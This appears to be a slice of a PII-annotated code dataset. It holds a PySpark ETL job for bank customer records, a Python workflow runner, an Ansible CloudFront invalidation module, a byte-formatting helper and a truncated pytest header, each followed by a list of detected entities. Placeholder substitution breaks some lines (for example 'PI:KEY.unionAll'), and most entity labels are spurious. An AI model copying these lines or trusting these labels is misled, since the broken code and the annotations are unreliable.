hdfs = sys.argv[3]
dbname = sys.argv[4]
#处理需要使用的日期
etl_date = sys.argv[1]
#etl日期
V_DT = etl_date
#上一日日期
V_DT_LD = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8])) + timedelta(-1)).strftime("%Y%m%d")
#月初日期
V_DT_FMD = date(int(etl_date[0:4]), int(etl_date[4:6]), 1).strftime("%Y%m%d")
#上月末日期
V_DT_LMD = (date(int(etl_date[0:4]), int(etl_date[4:6]), 1) + timedelta(-1)).strftime("%Y%m%d")
#10位日期
V_DT10 = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8]))).strftime("%Y-%m-%d")
V_STEP = 0
O_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+'/O_CI_XDXT_CUSTOMER_INFO/*')
O_CI_XDXT_CUSTOMER_INFO.registerTempTable("O_CI_XDXT_CUSTOMER_INFO")
#任务[12] 001-01::
V_STEP = V_STEP + 1
#先删除原表所有数据
ret = os.system("hdfs dfs -rm -r /"+dbname+"/F_CI_XDXT_CUSTOMER_INFO/*.parquet")
#从昨天备表复制一份全量过来
ret = os.system("hdfs dfs -cp -f /"+dbname+"/F_CI_XDXT_CUSTOMER_INFO_BK/"+V_DT_LD+".parquet /"+dbname+"/F_CI_XDXT_CUSTOMER_INFO/"+V_DT+".parquet")
F_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+'/F_CI_XDXT_CUSTOMER_INFO/*')
F_CI_XDXT_CUSTOMER_INFO.registerTempTable("F_CI_XDXT_CUSTOMER_INFO")
sql = """
SELECT A.CUSTOMERID AS CUSTOMERID
,A.CUSTOMERNAME AS CUSTOMERNAME
,A.CUSTOMERTYPE AS CUSTOMERTYPE
,A.CERTTYPE AS CERTTYPE
,A.CERTID AS CERTID
,A.CUSTOMERPASSWORD AS CUSTOMERPASSWORD
,A.INPUTORGID AS INPUTORGID
,A.INPUTUSERID AS INPUTUSERID
,A.INPUTDATE AS INPUTDATE
,A.REMARK AS REMARK
,A.MFCUSTOMERID AS MFCUSTOMERID
,A.STATUS AS STATUS
,A.BELONGGROUPID AS BELONGGROUPID
,A.CHANNEL AS CHANNEL
,A.LOANCARDNO AS LOANCARDNO
,A.CUSTOMERSCALE AS CUSTOMERSCALE
,A.CORPORATEORGID AS CORPORATEORGID
,A.REMEDYFLAG AS REMEDYFLAG
,A.DRAWFLAG AS DRAWFLAG
,A.MANAGERUSERID AS MANAGERUSERID
,A.MANAGERORGID AS MANAGERORGID
,A.DRAWELIGIBILITY AS DRAWELIGIBILITY
,A.BLACKSHEETORNOT AS BLACKSHEETORNOT
,A.CONFIRMORNOT AS CONFIRMORNOT
,A.CLIENTCLASSN AS CLIENTCLASSN
,A.CLIENTCLASSM AS CLIENTCLASSM
,A.BUSINESSSTATE AS BUSINESSSTATE
,A.MASTERBALANCE AS MASTERBALANCE
,A.UPDATEDATE AS UPDATEDATE
,A.FR_ID AS FR_ID
,V_DT AS ODS_ST_DATE
,'LNA' AS ODS_SYS_ID
FROM O_CI_XDXT_CUSTOMER_INFO A --客户基本信息
"""
sql = re.sub(r"\bV_DT\b", "'"+V_DT10+"'", sql)
F_CI_XDXT_CUSTOMER_INFO_INNTMP1 = sqlContext.sql(sql)
F_CI_XDXT_CUSTOMER_INFO_INNTMP1.registerTempTable("F_CI_XDXT_CUSTOMER_INFO_INNTMP1")
#F_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+'/F_CI_XDXT_CUSTOMER_INFO/*')
#F_CI_XDXT_CUSTOMER_INFO.registerTempTable("F_CI_XDXT_CUSTOMER_INFO")
sql = """
SELECT DST.CUSTOMERID --客户编号:src.CUSTOMERID
,DST.CUSTOMERNAME --客户名称:src.CUSTOMERNAME
,DST.CUSTOMERTYPE --客户类型:src.CUSTOMERTYPE
,DST.CERTTYPE --证件类型:src.CERTTYPE
,DST.CERTID --证件号:src.CERTID
,DST.CUSTOMERPASSWORD --客户口令:src.CUSTOMERPASSWORD
,DST.INPUTORGID --登记机构:src.INPUTORGID
,DST.INPUTUSERID --登记人:src.INPUTUSERID
,DST.INPUTDATE --登记日期:src.INPUTDATE
,DST.REMARK --备注:src.REMARK
,DST.MFCUSTOMERID --核心客户号:src.MFCUSTOMERID
,DST.STATUS --状态:src.STATUS
,DST.BELONGGROUPID --所属关联集团代码:src.BELONGGROUPID
,DST.CHANNEL --渠道:src.CHANNEL
,DST.LOANCARDNO --贷款卡编号:src.LOANCARDNO
,DST.CUSTOMERSCALE --客户规模:src.CUSTOMERSCALE
,DST.CORPORATEORGID --法人机构号:src.CORPORATEORGID
,DST.REMEDYFLAG --补登标志:src.REMEDYFLAG
,DST.DRAWFLAG --领取标志:src.DRAWFLAG
,DST.MANAGERUSERID --管户人:src.MANAGERUSERID
,DST.MANAGERORGID --管户机构ID:src.MANAGERORGID
,DST.DRAWELIGIBILITY --领取信息:src.DRAWELIGIBILITY
,DST.BLACKSHEETORNOT --是否黑名当客户:src.BLACKSHEETORNOT
,DST.CONFIRMORNOT --是否生效:src.CONFIRMORNOT
,DST.CLIENTCLASSN --当前客户分类:src.CLIENTCLASSN
,DST.CLIENTCLASSM --客户分类调整:src.CLIENTCLASSM
,DST.BUSINESSSTATE --存量字段标志:src.BUSINESSSTATE
,DST.MASTERBALANCE --单户余额:src.MASTERBALANCE
,DST.UPDATEDATE --更新日期:src.UPDATEDATE
,DST.FR_ID --法人代码:src.FR_ID
,DST.ODS_ST_DATE --平台日期:src.ODS_ST_DATE
,DST.ODS_SYS_ID --源系统代码:src.ODS_SYS_ID
FROM F_CI_XDXT_CUSTOMER_INFO DST
LEFT JOIN F_CI_XDXT_CUSTOMER_INFO_INNTMP1 SRC
ON SRC.CUSTOMERID = DST.CUSTOMERID
AND SRC.FR_ID = DST.FR_ID
WHERE SRC.CUSTOMERID IS NULL """
sql = re.sub(r"\bV_DT\b", "'"+V_DT10+"'", sql)
F_CI_XDXT_CUSTOMER_INFO_INNTMP2 = sqlContext.sql(sql)
dfn="F_CI_XDXT_CUSTOMER_INFO/"+V_DT+".parquet"
PI:KEY.unionAll(F_CI_XDXT_CUSTOMER_INFO_INNTMP1)
F_CI_XDXT_CUSTOMER_INFO_INNTMP1.cache()
F_CI_XDXT_CUSTOMER_INFO_INNTMP2.cache()
nrowsi = F_CI_XDXT_CUSTOMER_INFO_INNTMP1.count()
nrowsa = F_CI_XDXT_CUSTOMER_INFO_INNTMP2.count()
F_CI_XDXT_CUSTOMER_INFO_INNTMP2.write.save(path = hdfs + '/' + dfn, mode='overwrite')
F_CI_XDXT_CUSTOMER_INFO_INNTMP1.unpersist()
F_CI_XDXT_CUSTOMER_INFO_INNTMP2.unpersist()
et = datetime.now()
print("Step %d start[%s] end[%s] use %d seconds, insert F_CI_XDXT_CUSTOMER_INFO lines %d, all lines %d") % (V_STEP, st.strftime("%H:%M:%S"), et.strftime("%H:%M:%S"), (et-st).seconds, nrowsi, nrowsa)
ret = os.system("hdfs dfs -mv /"+dbname+"/F_CI_XDXT_CUSTOMER_INFO/"+V_DT_LD+".parquet /"+dbname+"/F_CI_XDXT_CUSTOMER_INFO_BK/")
#先删除备表当天数据
ret = os.system("hdfs dfs -rm -r /"+dbname+"/F_CI_XDXT_CUSTOMER_INFO_BK/"+V_DT+".parquet")
#从当天原表复制一份全量到备表
ret = os.system("hdfs dfs -cp -f /"+dbname+"/F_CI_XDXT_CUSTOMER_INFO/"+V_DT+".parquet /"+dbname+"/F_CI_XDXT_CUSTOMER_INFO_BK/"+V_DT+".parquet")
| 7,703 | [['LOCATION', '处理需要使用的日期'], ['LOCATION', '月初日期'], ['DATE_TIME', 'A.CERTTYPE'], ['LOCATION', 'A.CONFIRMORNOT'], ['PERSON', 'DST.BLACKSHEETORNOT'], ['PERSON', 'BLACKSHEETORNOT'], ['LOCATION', 'DST.CONFIRMORNOT'], ['NRP', 'DST.CLIENTCLASSN'], ['PERSON', 'nrowsa'], ['LOCATION', 'nrowsi'], ['LOCATION', 'nrowsa'], ['IP_ADDRESS', '01::\n'], ['URL', 'datetime.no'], ['URL', 'sys.ar'], ['URL', 'sc.se'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sqlContext.read.pa'], ['URL', 'INFO.re'], ['URL', 'os.sy'], ['URL', 'os.sy'], ['URL', 'sqlContext.read.pa'], ['URL', 'INFO.re'], ['URL', 'A.CU'], ['URL', 'A.CU'], ['URL', 'A.CU'], ['URL', 'A.CU'], ['URL', 'A.IN'], ['URL', 'A.IN'], ['URL', 'A.IN'], ['URL', 'A.RE'], ['URL', 'A.ST'], ['URL', 'A.BE'], ['URL', 'A.CH'], ['URL', 'A.CU'], ['URL', 'A.CO'], ['URL', 'A.RE'], ['URL', 'A.MA'], ['URL', 'A.MA'], ['URL', 'A.CO'], ['URL', 'A.CL'], ['URL', 'A.CL'], ['URL', 'A.MA'], ['URL', 'A.FR'], ['URL', 're.su'], ['URL', 'INNTMP1.re'], ['URL', 'sqlContext.read.pa'], ['URL', 'INFO.re'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.IN'], ['URL', 'src.IN'], ['URL', 'DST.IN'], ['URL', 'src.IN'], ['URL', 'DST.IN'], ['URL', 'src.IN'], ['URL', 'DST.RE'], ['URL', 'src.RE'], ['URL', 'DST.ST'], ['URL', 'src.ST'], ['URL', 'DST.BE'], ['URL', 'src.BE'], ['URL', 'DST.CH'], ['URL', 'src.CH'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CO'], ['URL', 'src.CO'], ['URL', 'DST.RE'], ['URL', 'src.RE'], ['URL', 'DST.MA'], ['URL', 'src.MA'], ['URL', 'DST.MA'], ['URL', 'src.MA'], ['URL', 'DST.CO'], ['URL', 'src.CO'], ['URL', 'DST.CL'], ['URL', 'src.CL'], ['URL', 'DST.CL'], ['URL', 'src.CL'], ['URL', 'DST.MA'], ['URL', 'src.MA'], ['URL', 'DST.FR'], ['URL', 'src.FR'], ['URL', 'SRC.CU'], ['URL', 'DST.CU'], ['URL', 'SRC.FR'], ['URL', 'DST.FR'], ['URL', 'SRC.CU'], ['URL', 're.su'], ['URL', 'INNTMP1.ca'], ['URL', 'INNTMP2.ca'], ['URL', 'INNTMP1.co'], ['URL', 'INNTMP2.co'], ['URL', 'INNTMP2.write.sa'], ['URL', 'datetime.no'], ['URL', 'st.st'], ['URL', 'et.st'], ['URL', 'os.sy'], ['URL', 'os.sy'], ['URL', 'os.sy']] |
96 | #!/usr/bin/python
"""
Copyright (c) 2014 High-Performance Computing and GIS (HPCGIS) Laboratory. All rights reserved.
Use of this source code is governed by a BSD-style license that can be found in the LICENSE file.
Authors and contributors: Eric Shook (dummy@email.com)
"""
import os
import datetime
import time
import re
import subprocess
from Queue import Queue
#from threading import Thread
import threading
import sys,getopt
'''
The workflow script accepts a tasklist file, which contains a list of taskfiles.
A task may represent a simulation of an ABM or climate model. Tasks can be run
simultaneously if there are no dependencies or ordered in the case of
dependencies. Tasks may also include pre-processing or post-processing tasks.
'''
# TODO: Logging may be useful if the workflow becomes long
# TODO: Currently num_threads is user-defined, which controls the number of threads to launch tasks
# However, it would be better to include in the taskfile the number of cores needed
# and define the number of cores available, enabling the workflow system to manage core allocation
# Global variables
# The number of threads used to handle tasks is passed as a parameter
num_threads=0
# Array of threads (so they can be killed if needed)
threads=[]
# Array of task workflow numbers (one per thread/worker)
threadtasknums=[]
# Task queue
taskqueue=Queue()
# This function handles executing a task defined by a taskfile
def runtask(taskfile):
# Read and parse the taskfile with the following format
# Note additional parameters will likely be added based on need (e.g., CWD, data-dir)
'''
program: /path/to/executable_with_a_name
parameters: param1 -Optionalconfiguration param2 -AnotherParameter
'''
with open(taskfile,'r') as f:
# Set the required parameters as None for error checking at the end
program=None
parameters=None
for line in f:
if line.startswith("program:"):
# Extract the entire program location from after the colon split()[1]) with whitespace removed (strip())
program=line.split(":",1)[1].strip()
#print "Program="+program
if line.startswith("parameters:"):
# Extract the parameter string from after the colon split()[1]) with whitespace removed (strip())
parameters=line.split(":",1)[1].strip()
#print "Parameters="+parameters
# Error checking for required parameters
if program==None:
raise Exception("program missing in taskfile",taskfile)
if parameters==None:
raise Exception("parameters missing in taskfile",taskfile)
print "Calling program="+program,parameters
'''
In future versions that have defined input,output,stdout,etc.
there could be more logic here to:
- run each model in a defined directory
- output stdout,stderr in the directory
- package up output files for easier transfer
- ...
'''
returncode=subprocess.check_call(program+" "+parameters,shell=True)
# A task worker loops while there are tasks left in the taskqueue
# Input parameter is a thread id (tid)
def taskworker(tid):
while not taskqueue.empty():
taskfile=taskqueue.get()
tasknum=taskfile.split("/",1)[1].split(".",1)[0].strip()
tasknum=re.sub("\D", "", tasknum)
#print "tid=",tid
threadtasknums[tid]=int(tasknum)
# While there is a dependency problem (lower order task numbers are still being processed)
# then spintwait
mintasknum=min(threadtasknums)
while threadtasknums[tid]>mintasknum:
#print "min=",minthreadtasknum,"min(array)=",min(*threadtasknums),"nums[",i,"]=",threadtasknums[i]
#if(threadtasknums[tid]<=min(*threadtasknums)): # If this task number is less than or equal to the minimum
# break # then there are no dependencies, so you can break out of this infinite loop
time.sleep(1) # this is a spin-wait loop
mintasknum=min(*threadtasknums)
print "Thread",tid,"running",taskfile,"at",str(datetime.datetime.now())
try:
runtask(taskfile)
except:
exit(1)
taskqueue.task_done()
threadtasknums[tid]=999999 # Set the tasknum for tid to 9999 so it doesn't influence dependencies
print "Thread",tid,"quitting, because taskqueue is empty"
# Main program code
def main():
print "Starting node workflow"
try:
opts,args=getopt.getopt(sys.argv[1:],"n:t:",["numthreads=","tasklist="])
except getopt.GetoptError:
print "workflow.py -n <number of threads to launch> -t <tasklistfile>"
sys.exit(1)
# Set model filename and experiment name based on command-line parameter
num_threads=0
tasklistfile=""
for opt, arg in opts:
if opt in ("-n", "--numthreads"):
num_threads=int(arg)
if opt in ("-t", "--tasklist"):
tasklistfile=arg
err=0
if num_threads<=0:
print " [ ERROR ] Number of threads must be greater than 0"
err=1
if tasklistfile=="":
print " [ ERROR ] Must provide tasklistfile"
err=1
if err==1:
print "workflow.py -n <number of threads to launch> -t <tasklistfile>"
sys.exit(1)
print "Executing in current directory :",os.getcwd()
print "Reading tasklist file"
with open(tasklistfile,'r') as f:
taskfiles = f.readlines()
f.close()
# tasksdir = 'tasks/'
# taskfiles = os.listdir(tasksdir) # Contains a list of task files to process
taskfiles.sort()
print "Starting task queue"
for taskfile in taskfiles:
taskqueue.put(taskfile.strip())
print "Task queue contains ",taskqueue.qsize()," tasks"
# Start the workflow engine
# Currently the logic is simple -> one task==one thread==one core but that will need
# to be modified to account for multithreaded models (agent-based and climate)
# so eventually this will need to parse the task to determine the number of cores
# needed by the task and dynamically manage the number of tasks running simultaneously
print "Starting ",num_threads," threads"
for i in range(num_threads):
threadtasknums.append(-1)
t=threading.Thread(target=taskworker,args=(i,))
t.daemon=True
t.setDaemon(True)
t.start()
threads.append(t)
# Now we wait until all of the tasks are finished.
print "Waiting for threads to finish"
# Normally you can use a blocking .join, but then you cannot kill the process
# So instead we spin-wait and catch ^C so a user can kill this process.
# while threading.activeCount() > 0:
# time.sleep(20)
while taskqueue.qsize()>0:
time.sleep(1)
print "taskqueue size",taskqueue.qsize()
''' # FIXME: Need to clean up this code, which was used for testing ^C
try:
time.sleep(5) # Wait 5 seconds before checking again
# FIXME: In production this should be changed to 30
# If Ctrl+C or other error, kill all of the threads
except:
while not taskqueue.empty(): # Empty the queue
taskqueue.get()
for i in threads:
i.kill_received=True
i.kill()
exit(1)
'''
print "Joining taskqueue"
# At this point all of the tasks should be finished so we join them
notfinished=1
while notfinished==1:
notfinished=0
for i in range(num_threads):
if threadtasknums[i]<999999:
notfinished=1
time.sleep(1)
#while not taskqueue.join(1):
# time.sleep(1)
print "Finished node workflow"
# Run main
if __name__=="__main__":
main()
| 7,938 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Eric Shook'], ['PERSON', "getopt\n\n'"], ['PERSON', 'TODO'], ['PERSON', 'tasknum=taskfile.split("/",1)[1].split("'], ['PERSON', 'tasknum=re.sub("\\D'], ['PERSON', 'tasknum'], ['PERSON', 'mintasknum=min(threadtasknums'], ['PERSON', 'tasksdir'], ['LOCATION', '.join'], ['DATE_TIME', '5 seconds'], ['URL', 'email.com'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'subprocess.ch'], ['URL', 'taskqueue.ge'], ['URL', 're.su'], ['URL', 'time.sl'], ['URL', 'datetime.datetime.no'], ['URL', 'getopt.ge'], ['URL', 'sys.ar'], ['URL', 'getopt.Ge'], ['URL', 'workflow.py'], ['URL', 'workflow.py'], ['URL', 'os.ge'], ['URL', 'f.re'], ['URL', 'f.cl'], ['URL', 'os.li'], ['URL', 'taskfiles.so'], ['URL', 'taskfile.st'], ['URL', 'threading.Th'], ['URL', 't.se'], ['URL', 't.st'], ['URL', 'threading.ac'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'taskqueue.ge'], ['URL', 'i.ki'], ['URL', 'i.ki'], ['URL', 'time.sl'], ['URL', 'taskqueue.jo'], ['URL', 'time.sl']] |
97 | #!/usr/bin/python
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cloudfront_invalidation
short_description: create invalidations for AWS CloudFront distributions
description:
- Allows for invalidation of a batch of paths for a CloudFront distribution.
requirements:
- boto3 >= 1.0.0
- python >= 2.6
version_added: "2.5"
author: Willem van Ketwich (@wilvk)
extends_documentation_fragment:
- aws
- ec2
options:
distribution_id:
description:
- The ID of the CloudFront distribution to invalidate paths for. Can be specified instead of the alias.
required: false
type: str
alias:
description:
- The alias of the CloudFront distribution to invalidate paths for. Can be specified instead of distribution_id.
required: false
type: str
caller_reference:
description:
- A unique reference identifier for the invalidation paths.
- Defaults to current datetime stamp.
required: false
default:
type: str
target_paths:
description:
- A list of paths on the distribution to invalidate. Each path should begin with '/'. Wildcards are allowed. eg. '/foo/bar/*'
required: true
type: list
elements: str
notes:
- does not support check mode
'''
EXAMPLES = '''
- name: create a batch of invalidations using a distribution_id for a reference
cloudfront_invalidation:
distribution_id: E15BU8SDCGSG57
caller_reference: testing 123
target_paths:
- /testpathone/test1.css
- /testpathtwo/test2.js
- /testpaththree/test3.ss
- name: create a batch of invalidations using an alias as a reference and one path using a wildcard match
cloudfront_invalidation:
alias: alias.test.com
caller_reference: testing 123
target_paths:
- /testpathone/test4.css
- /testpathtwo/test5.js
- /testpaththree/*
'''
RETURN = '''
invalidation:
description: The invalidation's information.
returned: always
type: complex
contains:
create_time:
description: The date and time the invalidation request was first made.
returned: always
type: str
sample: '2018-02-01T15:50:41.159000+00:00'
id:
description: The identifier for the invalidation request.
returned: always
type: str
sample: I2G9MOWJZFV612
invalidation_batch:
description: The current invalidation information for the batch request.
returned: always
type: complex
contains:
caller_reference:
description: The value used to uniquely identify an invalidation request.
returned: always
type: str
sample: testing 123
paths:
description: A dict that contains information about the objects that you want to invalidate.
returned: always
type: complex
contains:
items:
description: A list of the paths that you want to invalidate.
returned: always
type: list
sample:
- /testpathtwo/test2.js
- /testpathone/test1.css
- /testpaththree/test3.ss
quantity:
description: The number of objects that you want to invalidate.
returned: always
type: int
sample: 3
status:
description: The status of the invalidation request.
returned: always
type: str
sample: Completed
location:
description: The fully qualified URI of the distribution and invalidation batch request.
returned: always
type: str
sample: https://cloudfront.amazonaws.PI:KEY
'''
from ansible.module_utils.ec2 import get_aws_connection_info
from ansible.module_utils.ec2 import ec2_argument_spec, boto3_conn
from ansible.module_utils.ec2 import snake_dict_to_camel_dict
from ansible.module_utils.ec2 import camel_dict_to_snake_dict
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.aws.cloudfront_facts import CloudFrontFactsServiceManager
import datetime
try:
from botocore.exceptions import ClientError, BotoCoreError
except ImportError:
pass # caught by imported AnsibleAWSModule
class CloudFrontInvalidationServiceManager(object):
"""
Handles CloudFront service calls to AWS for invalidations
"""
def __init__(self, module):
self.module = module
self.create_client('cloudfront')
def create_client(self, resource):
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(self.module, boto3=True)
self.client = boto3_conn(self.module, conn_type='client', resource=resource, region=region, endpoint=ec2_url, **aws_connect_kwargs)
def create_invalidation(self, distribution_id, invalidation_batch):
current_invalidation_response = self.get_invalidation(distribution_id, invalidation_batch['CallerReference'])
try:
response = self.client.create_invalidation(DistributionId=distribution_id, InvalidationBatch=invalidation_batch)
response.pop('ResponseMetadata', None)
if current_invalidation_response:
return response, False
else:
return response, True
except BotoCoreError as e:
self.module.fail_json_aws(e, msg="Error creating CloudFront invalidations.")
except ClientError as e:
if ('Your request contains a caller reference that was used for a previous invalidation batch '
'for the same distribution.' in e.response['Error']['Message']):
self.module.warn("InvalidationBatch target paths are not modifiable. "
"To make a new invalidation please update caller_reference.")
return current_invalidation_response, False
else:
self.module.fail_json_aws(e, msg="Error creating CloudFront invalidations.")
def get_invalidation(self, distribution_id, caller_reference):
current_invalidation = {}
# find all invalidations for the distribution
try:
paginator = self.client.get_paginator('list_invalidations')
invalidations = paginator.paginate(DistributionId=distribution_id).build_full_result().get('InvalidationList', {}).get('Items', [])
invalidation_ids = [inv['Id'] for inv in invalidations]
except (BotoCoreError, ClientError) as e:
self.module.fail_json_aws(e, msg="Error listing CloudFront invalidations.")
# check if there is an invalidation with the same caller reference
for inv_id in invalidation_ids:
try:
invalidation = self.client.get_invalidation(DistributionId=distribution_id, Id=inv_id)['Invalidation']
caller_ref = invalidation.get('InvalidationBatch', {}).get('CallerReference')
except (BotoCoreError, ClientError) as e:
self.module.fail_json_aws(e, msg="Error getting CloudFront invalidation {0}".format(inv_id))
if caller_ref == caller_reference:
current_invalidation = invalidation
break
current_invalidation.pop('ResponseMetadata', None)
return current_invalidation
class CloudFrontInvalidationValidationManager(object):
"""
Manages CloudFront validations for invalidation batches
"""
def __init__(self, module):
self.module = module
self.__cloudfront_facts_mgr = CloudFrontFactsServiceManager(module)
def validate_distribution_id(self, distribution_id, alias):
try:
if distribution_id is None and alias is None:
self.module.fail_json(msg="distribution_id or alias must be specified")
if distribution_id is None:
distribution_id = self.__cloudfront_facts_mgr.get_distribution_id_from_domain_name(alias)
return distribution_id
except (ClientError, BotoCoreError) as e:
self.module.fail_json_aws(e, msg="Error validating parameters.")
def create_aws_list(self, invalidation_batch):
aws_list = {}
aws_list["Quantity"] = len(invalidation_batch)
aws_list["Items"] = invalidation_batch
return aws_list
def validate_invalidation_batch(self, invalidation_batch, caller_reference):
try:
if caller_reference is not None:
valid_caller_reference = caller_reference
else:
valid_caller_reference = datetime.datetime.now().isoformat()
valid_invalidation_batch = {
'paths': self.create_aws_list(invalidation_batch),
'caller_reference': valid_caller_reference
}
return valid_invalidation_batch
except (ClientError, BotoCoreError) as e:
self.module.fail_json_aws(e, msg="Error validating invalidation batch.")
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
caller_reference=dict(),
distribution_id=dict(),
alias=dict(),
target_paths=dict(required=True, type='list')
))
module = AnsibleAWSModule(argument_spec=argument_spec, supports_check_mode=False, mutually_exclusive=[['distribution_id', 'alias']])
validation_mgr = CloudFrontInvalidationValidationManager(module)
service_mgr = CloudFrontInvalidationServiceManager(module)
caller_reference = module.params.get('caller_reference')
distribution_id = module.params.get('distribution_id')
alias = module.params.get('alias')
target_paths = module.params.get('target_paths')
result = {}
distribution_id = validation_mgr.validate_distribution_id(distribution_id, alias)
valid_target_paths = validation_mgr.validate_invalidation_batch(target_paths, caller_reference)
valid_pascal_target_paths = snake_dict_to_camel_dict(valid_target_paths, True)
result, changed = service_mgr.create_invalidation(distribution_id, valid_pascal_target_paths)
module.exit_json(changed=changed, **camel_dict_to_snake_dict(result))
if __name__ == '__main__':
main()
| 10,484 | [['DATE_TIME', '2017'], ['PERSON', 'Willem van Ketwich'], ['DATE_TIME', '2018-02-01T15:50:41.159000+'], ['DATE_TIME', "00:00'\n i"], ['PERSON', 'aws_connect_kwargs = get_aws_connection_info(self.module'], ['URL', 'self.mo'], ['LOCATION', 'BotoCoreError'], ['LOCATION', 'BotoCoreError'], ['PERSON', "caller_reference = module.params.get('caller_reference'"], ['LOCATION', 'validation_mgr.validate_invalidation_batch(target_paths'], ['URL', 'https://www.gnu.org/licenses/gpl-3.0.txt'], ['URL', 'https://cloudfront.am'], ['URL', 'alias.test.com'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.aws.co'], ['URL', 'ansible.mo'], ['URL', 'utils.aws.cl'], ['URL', 'self.mo'], ['URL', 'self.cr'], ['URL', 'self.cl'], ['URL', 'self.mo'], ['URL', 'self.ge'], ['URL', 'self.client.cr'], ['URL', 'self.mo'], ['URL', 'e.re'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'self.client.ge'], ['URL', 'paginator.pa'], ['URL', 'self.mo'], ['URL', 'self.client.ge'], ['URL', 'invalidation.ge'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'mgr.ge'], ['URL', 'self.mo'], ['URL', 'datetime.datetime.no'], ['URL', 'self.cr'], ['URL', 'self.mo'], ['URL', 'module.params.ge'], ['URL', 'module.params.ge'], ['URL', 'module.params.ge'], ['URL', 'module.params.ge'], ['URL', 'mgr.va'], ['URL', 'mgr.va'], ['URL', 'mgr.cr']] |
98 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2006 José de Paula Eufrásio Junior (dummy@email.com) AND
# Yves Junqueira (dummy@email.com)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
# from http://www.voidspace.org.uk/python/pathutils.html (BSD License)
def formatbytes(sizeint, configdict=None, **configs):
"""
Given a file size as an integer, return a nicely formatted string that
represents the size. Has various options to control it's output.
You can pass in a dictionary of arguments or keyword arguments. Keyword
arguments override the dictionary and there are sensible defaults for options
you don't set.
Options and defaults are as follows :
* ``forcekb = False`` - If set this forces the output to be in terms
of kilobytes and bytes only.
* ``largestonly = True`` - If set, instead of outputting
``1 Mbytes, 307 Kbytes, 478 bytes`` it outputs using only the largest
denominator - e.g. ``1.3 Mbytes`` or ``17.2 Kbytes``
* ``kiloname = 'Kbytes'`` - The string to use for kilobytes
* ``meganame = 'Mbytes'`` - The string to use for Megabytes
* ``bytename = 'bytes'`` - The string to use for bytes
* ``nospace = True`` - If set it outputs ``1Mbytes, 307Kbytes``,
notice there is no space.
Example outputs : ::
19Mbytes, 75Kbytes, 255bytes
2Kbytes, 0bytes
23.8Mbytes
.. note::
It currently uses the plural form even for singular.
"""
defaultconfigs = { 'forcekb' : False,
'largestonly' : True,
'kiloname' : 'Kbytes',
'meganame' : 'Mbytes',
'bytename' : 'bytes',
'nospace' : True}
if configdict is None:
configdict = {}
for entry in configs:
# keyword parameters override the dictionary passed in
configdict[entry] = configs[entry]
#
for keyword in defaultconfigs:
if not configdict.has_key(keyword):
configdict[keyword] = defaultconfigs[keyword]
#
if configdict['nospace']:
space = ''
else:
space = ' '
#
mb, kb, rb = bytedivider(sizeint)
if configdict['largestonly']:
if mb and not configdict['forcekb']:
return stringround(mb, kb)+ space + configdict['meganame']
elif kb or configdict['forcekb']:
if mb and configdict['forcekb']:
kb += 1024*mb
return stringround(kb, rb) + space+ configdict['kiloname']
else:
return str(rb) + space + configdict['bytename']
else:
outstr = ''
if mb and not configdict['forcekb']:
outstr = str(mb) + space + configdict['meganame'] +', '
if kb or configdict['forcekb'] or mb:
if configdict['forcekb']:
kb += 1024*mb
outstr += str(kb) + space + configdict['kiloname'] +', '
return outstr + str(rb) + space + configdict['bytename']
| 3,822 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2006'], ['PERSON', 'José de Paula Eufrásio Junior'], ['PERSON', 'Yves Junqueira'], ['PERSON', 'Franklin St'], ['LOCATION', 'Boston'], ['LOCATION', 'USA'], ['PERSON', 'Mbytes'], ['PERSON', 'largestonly'], ['PERSON', 'meganame'], ['PERSON', 'Mbytes'], ['LOCATION', 'stringround(mb'], ['URL', 'http://www.voidspace.org.uk/python/pathutils.html'], ['IP_ADDRESS', '\n \n '], ['IP_ADDRESS', 'e::\n \n '], ['URL', 'email.com'], ['URL', 'email.com']] |
99 | import random
import uuid
from datetime import date, datetime, timedelta
import pytest
from app import db
from app.dao import fact_processing_time_dao
from app.dao.email_branding_dao import dao_create_email_branding
